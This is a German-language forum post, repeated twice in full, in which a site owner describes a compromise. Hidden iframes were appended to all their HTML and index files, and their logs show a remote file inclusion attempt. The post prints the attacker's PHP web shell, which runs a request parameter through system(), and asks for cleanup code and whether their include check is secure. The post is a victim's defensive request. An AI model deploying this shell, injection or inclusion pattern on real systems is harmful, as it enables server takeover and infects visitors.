hmmm
mich wollte oder hat gerade jemand geärgert...
und zwar hatte ich am ende jeder htm und html Datei und am ende jeder Datei die mit index beginnt
einige iframes
CODE <html><iframe width=0 height=0 frameborder=0 src=http://www...... marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
in manchen Datein nur einmal in anderen mehre male
wahrscheinlich konnte da jemand ein script einschleusen das diesen Code an jede der Dateien angehängt hat.
und höchstwarscheinlich kommt dieser Fehler von einem Forenscript bei dem man sich durch ein simples Coockie als Admin einloggen konnte
Den Namen dieses Forum möchte ich hier nicht nennen)
So erste Frage.
ich habe jetzt diese Codes per Hand rausgeschmissen, aber das geht auch auch per PHP.
hat da jemand vielleicht einen passenden Code, der vom root aus, alle verzeichnisse durchläuft,
dann in jeder Datei ein XXX zu AAA ändert und die Datei dan speichert..???
zweite Frage.
in den Logfiles habe ich einen Aufruf gefunden ala
index.php?seite=http:// .....
da wurde versucht eine datei mit der endung .txt?&cmd=ls zu laden
inhalt der Datei sah neben etwas html so aus
CODE <?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
so diese index.php?seite= abfrage wird aber so verarbeitet
CODE if($seite && file_exists("./$seite")){
$seite=str_replace("http://","",$seite);
$lade=strip_tags($seite);
include("./$lade.php");
}else{
# index laden
}
das sollte doch eigentlich ausreiche?
mich wollte oder hat gerade jemand geärgert...
und zwar hatte ich am ende jeder htm und html Datei und am ende jeder Datei die mit index beginnt
einige iframes
CODE <html><iframe width=0 height=0 frameborder=0 src=http://www...... marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
in manchen Datein nur einmal in anderen mehre male
wahrscheinlich konnte da jemand ein script einschleusen das diesen Code an jede der Dateien angehängt hat.
und höchstwarscheinlich kommt dieser Fehler von einem Forenscript bei dem man sich durch ein simples Coockie als Admin einloggen konnte
Den Namen dieses Forum möchte ich hier nicht nennen)
So erste Frage.
ich habe jetzt diese Codes per Hand rausgeschmissen, aber das geht auch auch per PHP.
hat da jemand vielleicht einen passenden Code, der vom root aus, alle verzeichnisse durchläuft,
dann in jeder Datei ein XXX zu AAA ändert und die Datei dan speichert..???
zweite Frage.
in den Logfiles habe ich einen Aufruf gefunden ala
index.php?seite=http:// .....
da wurde versucht eine datei mit der endung .txt?&cmd=ls zu laden
inhalt der Datei sah neben etwas html so aus
CODE <?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
so diese index.php?seite= abfrage wird aber so verarbeitet
CODE if($seite && file_exists("./$seite")){
$seite=str_replace("http://","",$seite);
$lade=strip_tags($seite);
include("./$lade.php");
}else{
# index laden
}
das sollte doch eigentlich ausreiche?